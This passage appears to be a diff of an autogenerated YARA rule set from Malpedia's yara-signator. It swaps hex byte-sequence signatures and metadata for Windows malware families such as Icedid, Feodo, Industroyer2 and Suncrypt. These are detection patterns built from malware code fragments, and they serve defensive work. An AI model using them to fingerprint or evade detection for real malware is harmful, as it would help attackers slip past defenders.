+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vhd_ransomware_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "7950fd3d879183156c1cd9194f7d7f790283d1f02a5c57bd2f302dbba8044501"
+		logic_hash = "084f45fac9b312e6724b7901489af4dd8f07289f6b7a3bdcfaaadbb0b1238055"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -115288,32 +115463,32 @@ rule MALPEDIA_Win_Graphdrop_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 4156 415e 5a }
-		$sequence_1 = { 4155 49c7c501000000 4150 4152 415a }
-		$sequence_2 = { 53 0f77 5b 90 }
-		$sequence_3 = { 90 415f 90 415d }
-		$sequence_4 = { 49c7c501000000 4150 4152 415a 4158 }
-		$sequence_5 = { 0f77 4157 90 415f }
-		$sequence_6 = { 415b 50 0f77 4155 }
-		$sequence_7 = { 58 e9???????? 53 48c7c303000000 }
-		$sequence_8 = { 4155 49c7c501000000 4150 4152 415a 4158 }
-		$sequence_9 = { 50 90 53 0f77 }
+		$sequence_0 = { a1???????? 33c5 8945fc 53 8bd9 8b13 57 }
+		$sequence_1 = { 83c410 8dbdf0fdffff e8???????? a1???????? e9???????? }
+		$sequence_2 = { 33d2 e8???????? 8b4d08 0bc7 }
+		$sequence_3 = { 8b450c 8902 33c0 89a578f6ffff 39450c 7e11 8d4a04 }
+		$sequence_4 = { 83c404 a1???????? 8b3d???????? 40 6a00 c1e018 }
+		$sequence_5 = { 8b4d08 85c9 7538 33c0 b9c8000000 }
+		$sequence_6 = { 333c9598754100 337e04 ff4de8 897804 8b38 }
+		$sequence_7 = { f7e2 0f90c1 89b518f0ffff f7d9 0bc8 51 }
+		$sequence_8 = { 8945cc bf40000000 b8???????? 8d75e0 895dc8 c745f40f000000 c745f000000000 }
+		$sequence_9 = { d9bd1ee6ffff 0fb7851ee6ffff 0d000c0000 898518e6ffff 43 d9ad18e6ffff db9d18e6ffff }
 
 	condition:
-		7 of them and filesize < 4186112
+		7 of them and filesize < 275456
 }
-rule MALPEDIA_Win_Nighthawk_Auto : FILE
+rule MALPEDIA_Win_Moure_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "031218c2-08fe-51c2-a9be-67ba73d1aae5"
+		id = "d5ea53f7-d6a1-5284-9152-98034607f388"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nighthawk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nighthawk_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moure"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.moure_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "477ee6b7607005d8498fab8a4f21f58e1d0451668a3652d5802801764720896d"
+		logic_hash = "e394b210e6ac1eaa6569608ddb349d4dd1ae50231f20d0924074c460f1fa6782"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115327,32 +115502,32 @@ rule MALPEDIA_Win_Nighthawk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7405 e8???????? 4c8965b8 48c745c00f000000 448865a8 488d0d83250c00 ff15???????? }
-		$sequence_1 = { 8b442430 39442470 731f 488d8c24f8000000 e8???????? 8b4c2470 488b542450 }
-		$sequence_2 = { 488bf0 4c897560 4c89742470 4489742478 4c89742450 4c89742460 458d660f }
-		$sequence_3 = { 4c8d85a0000000 8d53a2 488b4008 ff15???????? 85c0 0f844a040000 448b4510 }
-		$sequence_4 = { 57 4883ec30 488bd9 0f57c0 8b490c 488bfa 0f11442420 }
-		$sequence_5 = { 83e00f 2bc2 4898 488b8c2448010000 0fb60401 8b8c24d4000000 03c8 }
-		$sequence_6 = { 4885c0 488bf8 742e 4c8bc3 498bd6 488bc8 e8???????? }
-		$sequence_7 = { 740a 4c8b7920 4c037918 eb03 4c8bfe 4c89bd20010000 e9???????? }
-		$sequence_8 = { 83ea01 7407 83fa01 752c eb11 48833d????????00 488d05e70a0300 }
-		$sequence_9 = { 755b 488365df00 488365ef00 48c745f70f000000 458d4610 488d1577010600 }
+		$sequence_0 = { 3454 43 1558c950cb 0d487b0d4c 36a373801f1e }
+		$sequence_1 = { bf55602540 006b05 bc7d506700 0033 58 bf35b8bf55 58 }
+		$sequence_2 = { 8b35???????? 57 00d6 0075f0 894508 0075fc 00d6 }
+		$sequence_3 = { 51 51 8b0d???????? 56 33f6 85c9 7509 }
+		$sequence_4 = { 837dbc00 7436 0075bc 8d4ddc e8???????? a1???????? 3bc6 }
+		$sequence_5 = { 82a8a200b000c1 8b00 e100 9e d28bd3977e8d 98 }
+		$sequence_6 = { 68b0704000 007014 007010 e8???????? }
+		$sequence_7 = { 5e 53 43 c1c361 5b c9 51 }
+		$sequence_8 = { 8b01 83e03f 3c02 751c 8b4514 8b10 83e23f }
+		$sequence_9 = { 42 c3 874226 c58035b4fe70 5e }
 
 	condition:
-		7 of them and filesize < 1949696
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Unidentified_023_Auto : FILE
+rule MALPEDIA_Win_Paladin_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f77c5286-0b1f-561f-8f58-a27a0408436a"
+		id = "13b994af-533a-5dbe-b8e1-24beb3442212"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_023_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.paladin_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "1eec10f2afa6bd7e6a1d69558f2f25a771bedb385bd839fc0b4d5b578eec4086"
+		logic_hash = "686a1e9450a5c31100baeb4f1e4232469278fd6c7cba4e878a1957caee81dcdc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115366,32 +115541,32 @@ rule MALPEDIA_Win_Unidentified_023_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? ff15???????? 3bf4 e8???????? b801000000 52 }
-		$sequence_1 = { 894df4 8a15???????? 8855f8 837d0c01 7514 8bf4 68???????? }
-		$sequence_2 = { 8855f8 837d0c01 7514 8bf4 }
-		$sequence_3 = { 8945f0 8b0d???????? 894df4 8a15???????? 8855f8 837d0c01 }
-		$sequence_4 = { 8855f8 837d0c01 7514 8bf4 68???????? }
-		$sequence_5 = { 68???????? ff15???????? 3bf4 e8???????? b801000000 52 8bcd }
-		$sequence_6 = { 0909 0909 0407 0807 8d4900 4f }
-		$sequence_7 = { 8a15???????? 8855f8 837d0c01 7514 8bf4 }
-		$sequence_8 = { 8945f0 8b0d???????? 894df4 8a15???????? 8855f8 837d0c01 7514 }
-		$sequence_9 = { 7514 8bf4 68???????? ff15???????? 3bf4 e8???????? b801000000 }
+		$sequence_0 = { e8???????? 83c8ff 8b8c24e4010000 64890d00000000 81c4f0010000 c20400 8d4c2400 }
+		$sequence_1 = { eb37 8bce e8???????? 5e c20800 e8???????? 5e }
+		$sequence_2 = { 83f81a 8944241c 0f8cb6feffff 56 ff15???????? 8b4c2434 8d8424a4020000 }
+		$sequence_3 = { eb0c c744241430a80010 8b7c2414 8b2d???????? }
+		$sequence_4 = { 8d0417 8d0440 8d0480 c1e002 3bf0 7344 833d????????01 }
+		$sequence_5 = { ffd7 8b4e18 3bcb 7406 8b11 6a01 ff12 }
+		$sequence_6 = { 50 52 ff15???????? e9???????? 3d05010000 7417 }
+		$sequence_7 = { 8b4604 8d4e08 894204 e8???????? 56 e8???????? 8b4f14 }
+		$sequence_8 = { 6a00 52 ff15???????? 8b4624 8b4c2410 2bc3 8b6e58 }
+		$sequence_9 = { 85f6 897c2428 0f8490000000 85ff 0f8488000000 55 }
 
 	condition:
-		7 of them and filesize < 1433600
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Chinoxy_Auto : FILE
+rule MALPEDIA_Win_Industroyer2_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "42e4e8ac-898e-5ba1-b0d0-68925d7ec424"
+		id = "be2f5050-30a2-53df-a694-0ba33b5871cf"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinoxy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chinoxy_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer2"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.industroyer2_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "1545d921096fb73521705c66429b51a5fc0ae5b2cfe48972524e78dbe1d3ae8e"
+		logic_hash = "94208b597eddeff9489860d6342fc47049a5b4b079735882fa37a055dd142db4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115405,34 +115580,34 @@ rule MALPEDIA_Win_Chinoxy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bce 43 8d041b 50 e8???????? 85c0 89442428 }
-		$sequence_1 = { 83c8ff 5b c3 33c0 85ff 7628 8a0c30 }
-		$sequence_2 = { 8bf8 85ff 0f849c000000 68???????? }
-		$sequence_3 = { 83bf3420000005 753a e9???????? 68e8030000 8bcf e8???????? 8b44241c }
-		$sequence_4 = { 8bf1 57 c7442408???????? 8dbee0010000 85ff 897c240c 740a }
-		$sequence_5 = { 8d0498 85ff 8928 7427 ff4e08 eb1b 3b5e18 }
-		$sequence_6 = { ff15???????? 8b4c2410 8bc7 5f 5e 64890d00000000 }
-		$sequence_7 = { 8d8ec8020000 e8???????? 8d86d4020000 8b4c240c 894004 894008 c700???????? }
-		$sequence_8 = { 8bf9 897c2408 8d470c c7470400000000 50 }
-		$sequence_9 = { 6aff 6a00 6a00 6a00 6a00 6a00 6a00 }
+		$sequence_0 = { 55 8bec 83ec08 837d0800 7504 33c0 eb29 }
+		$sequence_1 = { 051d000100 50 68???????? e8???????? }
+		$sequence_2 = { 8b45fc 837c901000 7425 8b4dfc 8b5108 8b45fc }
+		$sequence_3 = { 51 e8???????? 8845ff 8b55f8 52 }
+		$sequence_4 = { 8b4dec 89410c 8b55fc 83c201 8955fc eb0e c745e804680000 }
+		$sequence_5 = { 8b4df8 83e140 7540 e8???????? 8bc8 e8???????? }
+		$sequence_6 = { 8b4df0 51 ff15???????? 85c0 7406 c645ff01 eb04 }
+		$sequence_7 = { 83ba600d010000 7e41 e8???????? 8bc8 e8???????? 68b3680000 8b4508 }
+		$sequence_8 = { 51 ff15???????? 8b85dcfeffff eb21 8d95d4feffff }
+		$sequence_9 = { c745ecffffffff eb15 8b450c c6801800010001 }
 
 	condition:
-		7 of them and filesize < 1138688
+		7 of them and filesize < 100352
 }
-rule MALPEDIA_Win_Croxloader_Auto : FILE
+rule MALPEDIA_Win_Icedid_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5f8b8916-f9ec-55d4-b465-31935c48c0ee"
+		id = "68e0204c-83cb-5a2b-b638-0e50311a0431"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.croxloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.croxloader_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.icedid_auto.yar#L1-L292"
 		license_url = "N/A"
-		logic_hash = "040078157977ad881b28f3c9384cda36c377a63a849b31c6b1d6ac06966284a5"
+		logic_hash = "e8c9e17a917aa63cbf96d9c82905a16b279179aa1e4dde7e0caa78f60904db7b"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -115444,32 +115619,54 @@ rule MALPEDIA_Win_Croxloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5b c3 4883ec38 488d05058b0000 41b91b000000 4889442420 }
-		$sequence_1 = { 33d2 4889bc2480030000 488bc8 ff15???????? }
-		$sequence_2 = { 0f841f010000 48895c2418 0f1f440000 4d8b5a60 bb05150000 450fb74a58 }
-		$sequence_3 = { b95595db6d e8???????? 4c8d05e3890100 ba403a485e b95595db6d e8???????? }
-		$sequence_4 = { 4a8b94e010970100 428a4cf23d f6c104 741b 428a44f23e 80e1fb }
-		$sequence_5 = { 488d0d88f90000 4183e23f 4903e8 498bf0 488b04c1 4b8d14d2 4c8b74d028 }
-		$sequence_6 = { 488d05661b0100 488d0d8f1d0100 488905???????? 48890d???????? }
-		$sequence_7 = { 488d3d2c290100 eb12 488b03 4885c0 }
-		$sequence_8 = { 895d9b 428844f13e 4b8b84e010970100 42804cf03d04 }
-		$sequence_9 = { 488d151eecffff 483bc2 7423 65488b042530000000 488b8998000000 483b4810 7206 }
+		$sequence_0 = { 85ff 7418 c60700 47 57 ff15???????? }
+		$sequence_1 = { 6905????????e8030000 50 ff35???????? ff15???????? }
+		$sequence_2 = { 740c 50 ff15???????? 33c0 40 eb11 }
+		$sequence_3 = { ff15???????? 8bf7 8bc6 eb02 33c0 }
+		$sequence_4 = { 0fb605???????? 0fb60d???????? 50 0fb605???????? 50 0fb605???????? 50 }
+		$sequence_5 = { 7413 ff36 6a08 ff15???????? 50 ff15???????? }
+		$sequence_6 = { ff15???????? 85c0 7420 837c241000 }
+		$sequence_7 = { 7427 6a3b 56 ff15???????? }
+		$sequence_8 = { e8???????? 8bf0 8d45fc 50 ff75fc 6a05 }
+		$sequence_9 = { 8b542414 0302 833800 759f }
+		$sequence_10 = { 47 83c302 3bfd 72c4 8b542414 0302 }
+		$sequence_11 = { 8b12 85d2 7454 8d6af8 d1ed 6a00 5f }
+		$sequence_12 = { 83c414 47 3b7820 72d1 }
+		$sequence_13 = { 3b7820 72d1 5b 33c0 40 5f }
+		$sequence_14 = { 0fb713 8954241c 66c16c241c0c 0fb7d2 }
+		$sequence_15 = { 8d4508 50 0fb6440b34 50 }
+		$sequence_16 = { a808 75f5 a804 7406 }
+		$sequence_17 = { ff15???????? 85c0 750a b8010000c0 e9???????? }
+		$sequence_18 = { ff5010 85c0 7407 33c0 }
+		$sequence_19 = { 85c9 7408 48 8b03 }
+		$sequence_20 = { ff15???????? 4d 85ff 7414 ff15???????? }
+		$sequence_21 = { 33c0 c74424200e000f00 4c 8d486b ff5018 85c0 7593 }
+		$sequence_22 = { 8b442420 48 8b4c2428 8a09 }
+		$sequence_23 = { 8b44480c 8b0c48 48 034f10 48 035728 ff15???????? }
+		$sequence_24 = { ff15???????? 488d5702 488bce ff15???????? }
+		$sequence_25 = { 44334c2440 48897c2438 4885ff 746b }
+		$sequence_26 = { ff15???????? 8bf8 85c0 7409 8b4c2478 }
+		$sequence_27 = { 7506 ff15???????? 80bb8000000040 0f8577ffffff }
+		$sequence_28 = { 7409 8b4c2478 493b0e 741e }
+		$sequence_29 = { 488bf0 4885c0 750d ff15???????? 33c0 e9???????? 8bd7 }
+		$sequence_30 = { 488bb590020000 488b7c2438 33c9 33d2 4885ff 7411 }
+		$sequence_31 = { 4883ec40 33ff 4d8bf0 482178d8 4c8bfa }
 
 	condition:
-		7 of them and filesize < 241664
+		7 of them and filesize < 303104
 }
-rule MALPEDIA_Win_Dustpan_Auto : FILE
+rule MALPEDIA_Win_Feodo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c9c878b8-cad8-5a19-8f4e-78ad38029b7f"
+		id = "8c5efd3c-e45d-5795-9ce3-096920bca9de"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dustpan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dustpan_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.feodo_auto.yar#L1-L172"
 		license_url = "N/A"
-		logic_hash = "5224f428476ca9b9e044abefc44ce9a53e06974708bc3448eb44f67994867ab4"
+		logic_hash = "4783bf3b64d586d0a2a41312eeb5a0cc464046d24e2955ae05259fe1fa6e0781"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115483,34 +115680,40 @@ rule MALPEDIA_Win_Dustpan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4533c0 4c891d???????? e8???????? 488d0d32010000 4883c420 5b e9???????? }
-		$sequence_1 = { b9ff000000 e8???????? 488bfb 4803ff 4c8d2d45eb0000 }
-		$sequence_2 = { 488d0d19a80100 33d2 c744242800000008 895c2420 ffd0 488b4d00 4833cc }
-		$sequence_3 = { 4c8be7 4c8bf7 49c1fe05 4c8d3dffb60000 }
-		$sequence_4 = { 488d05fb0a0100 eb04 4883c014 8918 e8???????? 4c8d15e30a0100 4885c0 }
-		$sequence_5 = { 7440 66448923 8a45d8 4b8b8cf8e0d00100 88443109 8a45d9 }
-		$sequence_6 = { e9???????? 488d0d45010000 e9???????? 4883ec28 488d0d12910000 e8???????? 488d0d39010000 }
-		$sequence_7 = { 488bca 48c1f905 4c8d0533760100 83e21f }
-		$sequence_8 = { 4889442420 e8???????? 488d8380000000 803800 741d 4c8d0df2bc0000 41b802000000 }
-		$sequence_9 = { 894704 e9???????? 488d0d351f0100 48394c2458 7427 }
+		$sequence_0 = { 83c120 8d51d0 83fa09 7704 8bca eb10 8d519f }
+		$sequence_1 = { 6a00 8d4c240c 51 52 50 8b442414 50 }
+		$sequence_2 = { 6a00 8d542424 52 6a00 ff15???????? 85c0 }
+		$sequence_3 = { 83c8ff c3 8b4c2404 b802000000 50 8b44240c }
+		$sequence_4 = { 742f 8b0f 6a01 68???????? 68???????? 68???????? }
+		$sequence_5 = { 6a00 8d942418020000 52 50 }
+		$sequence_6 = { 68???????? 6a00 50 ff15???????? 8b0e }
+		$sequence_7 = { 50 8b442414 50 ff15???????? 85c0 7405 }
+		$sequence_8 = { 2453 150d14f452 696969697f3cc3 af e2c3 }
+		$sequence_9 = { 1487 041e 6e 18b8161e6e18 }
+		$sequence_10 = { e2c3 e450 2478 232e }
+		$sequence_11 = { 7e67 08ee 73fe 6c 3800 16 }
+		$sequence_12 = { 2478 232e 1c5f 8d422e 2e2e2e2e2ee02e 2e2e2e2e2e2e2ea12e2e2e2e 690b721cb889 }
+		$sequence_13 = { 0056b0 2e2801 0bd0 83c4ce 00576a }
+		$sequence_14 = { 9a519a519a2e2e 2e2e20640444 4c 4c 63ab08080808 08c9 }
+		$sequence_15 = { 2ee83e207468 60 238b0d03c783 782e 1463 ab }
 
 	condition:
-		7 of them and filesize < 282624
+		7 of them and filesize < 270336
 }
-rule MALPEDIA_Win_Ground_Peony_Auto : FILE
+rule MALPEDIA_Win_Mosquito_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a6ba3822-837c-5f9f-87da-bacc2e30de24"
+		id = "71ca1f1d-a29d-5919-908a-8739132906e6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ground_peony"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ground_peony_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mosquito_auto.yar#L1-L196"
 		license_url = "N/A"
-		logic_hash = "e78f90db6174b77e8191ffdbebceb8195c536d4827a66bc4c3081db996009605"
+		logic_hash = "69b344d7d3f2add25a4f6f1220ea429e517503872e1e485621e80a5c5693cfe3"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -115522,32 +115725,43 @@ rule MALPEDIA_Win_Ground_Peony_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4883c308 488d0544f60000 483bd8 75d8 }
-		$sequence_1 = { e9???????? 488d0518d00000 4a8b04e8 42f644f83840 7405 803f1a 741f }
-		$sequence_2 = { 3b1d???????? 736b 488bc3 488bf3 48c1fe06 4c8d2d36d30000 83e03f }
-		$sequence_3 = { 4883ec20 488bf9 4c8d0d74970000 b904000000 4c8d0560970000 488d1561970000 e8???????? }
-		$sequence_4 = { 57 4156 4881ec30090000 488b05???????? 4833c4 4889842420090000 }
-		$sequence_5 = { ff15???????? 488bc7 488b8c2450010000 4833cc e8???????? 488b9c2470010000 4881c460010000 }
-		$sequence_6 = { 4883c428 c3 488d15878e0000 488d0d808d0000 }
-		$sequence_7 = { 488be9 4c8d0503710000 488d1504710000 b914000000 e8???????? }
-		$sequence_8 = { 4053 4883ec20 33db 488d15e1350100 4533c0 }
-		$sequence_9 = { 488b5c2430 4883c420 5f c3 48897c2408 488d3da0f60000 }
+		$sequence_0 = { f3a5 ff942464020000 81c450020000 85c0 }
+		$sequence_1 = { 52 50 6a00 6801c1fd7d }
+		$sequence_2 = { f7d8 1bc0 83e0b4 83c04c }
+		$sequence_3 = { 8b10 8bc8 56 53 ff5204 e8???????? 57 }
+		$sequence_4 = { 8b00 33ff 57 6880000000 6a03 57 6a01 }
+		$sequence_5 = { b9cb410000 f7f9 6a20 69c27b6d0100 }
+		$sequence_6 = { 8b10 8bc8 57 6842730000 }
+		$sequence_7 = { 897702 e8???????? 8b45fc 83c410 897842 5f }
+		$sequence_8 = { e8???????? 6a20 8bf0 e8???????? 8bc8 }
+		$sequence_9 = { 8bfc f3a5 ff942460020000 81c450020000 }
+		$sequence_10 = { 0000 0001 1001 c550f0 8b8078005900 }
+		$sequence_11 = { ff15???????? 6a00 56 ff15???????? 8903 }
+		$sequence_12 = { 0000 006301 1000 7500 }
+		$sequence_13 = { 0000 00645657 8b7dc2 0400 }
+		$sequence_14 = { 0000 0032 08804d086440 5e }
+		$sequence_15 = { e8???????? 6a20 8bd8 e8???????? 8bc8 }
+		$sequence_16 = { 0000 006500 676c 0010 }
+		$sequence_17 = { 0000 00748078 3001 40 }
+		$sequence_18 = { 0000 0018 a0???????? 57 }
+		$sequence_19 = { e8???????? 83c40c e8???????? 6a20 }
+		$sequence_20 = { 6f 00e8 108d8b060400 8b4589 45 8b54000b 0002 }
 
 	condition:
-		7 of them and filesize < 217088
+		7 of them and filesize < 1015808
 }
-rule MALPEDIA_Win_Enfal_Auto : FILE
+rule MALPEDIA_Win_Suncrypt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "01bf52c7-5562-58b0-bd6b-f99194c0bb2b"
+		id = "c1bd9658-a178-589d-b259-6cb82442d52c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.enfal_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.suncrypt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.suncrypt_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "c231b8446e9ed78bdd8a9cb59296768a0836b06ecc839e3d3e3a25695d5dfcf0"
+		logic_hash = "49201b307b7d384a9877d33cd9429c04ac8ef7ebb302c664ae5e0393ef621a39"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115561,32 +115775,32 @@ rule MALPEDIA_Win_Enfal_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8975ec e8???????? 8b7508 83c424 8d4df0 }
-		$sequence_1 = { 51 8d8d68ffffff 51 8d8de8fcffff }
-		$sequence_2 = { ff75ec ffd6 894304 8d4318 50 6a00 68???????? }
-		$sequence_3 = { 837b1800 8945ec 0f86a6000000 894df4 8955f8 8b4dfc }
-		$sequence_4 = { 50 e8???????? 83c410 8b461c }
-		$sequence_5 = { 683f000f00 8d8d68feffff 53 51 6803000080 ff5048 85c0 }
-		$sequence_6 = { 8b4df0 8908 ff45fc 8345f804 8b45fc }
-		$sequence_7 = { 50 897da0 e8???????? 8d45f0 68???????? }
-		$sequence_8 = { ff55d4 85c0 7471 56 8d8554feffff 6a00 }
-		$sequence_9 = { e8???????? 83c444 8d45f0 53 }
+		$sequence_0 = { 75f3 56 8b35???????? ffd6 ff75bc ffd6 ff75b8 }
+		$sequence_1 = { 837dfc00 c745cc00000000 0f86c9020000 8975d8 f6460c02 }
+		$sequence_2 = { ffd7 6808020000 6a00 68???????? a3???????? e8???????? 83c40c }
+		$sequence_3 = { 51 68???????? ffd3 3bc6 75db 3bd7 75d7 }
+		$sequence_4 = { c6857efeffff6d c6857ffeffff69 c68580feffff3a c68581feffff54 c68582feffff4e c68583feffff3a c68584feffff2b }
+		$sequence_5 = { 8a4616 240f 3c0a 7519 8b4508 66394608 }
+		$sequence_6 = { 894f34 8b4b1c 0f299d70ffffff 0f29ad40ffffff 0f29a550ffffff 0f29bdc0fdffff }
+		$sequence_7 = { 0f100e 894df4 8b4df0 660fefc8 0f104610 0f110a 0f104f10 }
+		$sequence_8 = { 6800020000 51 50 e8???????? 0fa4c209 c1e009 898338810200 }
+		$sequence_9 = { 41 83f810 72ef 5f }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 172032
 }
-rule MALPEDIA_Win_Slickshoes_Auto : FILE
+rule MALPEDIA_Win_Moonbounce_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d2f3560b-3237-526b-973c-5a49467a861c"
+		id = "2da98614-65a4-5227-bf42-e140c3206599"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slickshoes"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.slickshoes_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonbounce"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.moonbounce_auto.yar#L1-L113"
 		license_url = "N/A"
-		logic_hash = "97b262a4dee8ee1b76d2a0a337ee7fc4558fd80e3330d7f7994e897a96aa6369"
+		logic_hash = "c88f40d1d857bf1c76177c0c7eb43f16650b71d1b80bdf0f0745bd71c4b7c892"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115600,32 +115814,32 @@ rule MALPEDIA_Win_Slickshoes_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b976b1d971 60 f9 66b884f9 61 668bf8 6681ef5cec }
-		$sequence_1 = { ff3424 5d 57 89e7 81c704000000 83c704 57 }
-		$sequence_2 = { ff3424 8b1c24 83c404 56 890424 54 58 }
-		$sequence_3 = { e9???????? 21d8 e9???????? 813424e58bf74a e9???????? 5d 81c35678f537 }
-		$sequence_4 = { e9???????? 81c404000000 e9???????? 890c24 50 c70424fddfed59 892c24 }
-		$sequence_5 = { be00040000 bf0a000000 8913 be00040000 09fe 89fe 81ce00040000 }
-		$sequence_6 = { e9???????? ba2682ff7f 53 bb15b4fb3a 81c3b5b7ff7d e9???????? 56 }
-		$sequence_7 = { e9???????? c1e708 e9???????? 89df e9???????? 59 50 }
-		$sequence_8 = { 9d 7c77 52 c199????????f3 30e3 61 d6 }
-		$sequence_9 = { e9???????? 313c24 333c24 e9???????? 870c24 8b2424 e9???????? }
+		$sequence_0 = { 8b4120 83c114 894df8 85c0 0f857bffffff eb04 }
+		$sequence_1 = { f7c2feffffff 7640 eb03 8b4df0 8b5508 }
+		$sequence_2 = { 50 ffd6 8b4310 33f6 }
+		$sequence_3 = { ff15???????? 57 57 83c60c }
+		$sequence_4 = { 7439 3bc6 7435 6a30 }
+		$sequence_5 = { 55 8bec 83ec30 53 33db 53 }
